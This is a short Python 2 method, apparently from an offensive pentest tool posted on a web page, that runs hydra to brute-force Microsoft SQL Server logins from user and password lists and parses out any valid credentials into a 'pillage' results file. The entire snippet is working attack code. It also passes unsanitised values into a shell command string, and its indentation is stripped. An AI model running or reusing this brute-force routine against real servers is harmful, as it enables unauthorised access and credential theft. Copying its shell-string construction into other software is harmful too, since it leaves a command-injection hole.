def bruteforce(self, ip_address, port, userList, passList):
print "INFO: Performing hydra msSql scan against " + ip_address
hydraCmd = "hydra -L %s -P %s -f -e n -o pillageResults/%s_msSqlhydra.txt -u %s -s %s mssql" % (userList, passList, ip_address, ip_address, port)
creds={}
try:
results = subprocess.check_output(hydraCmd, shell=True)
resultarr = results.split("\n")
for result in resultarr:
if "login:" in result:
print "[*] Valid msSql credentials found: " + result
resultList=result.split()
self.username=resultList[4]
if resultList[6]:
self.password=resultList[6]
else:
self.password=''
except:
print "INFO: No valid msSql credentials found"
评论列表
文章目录
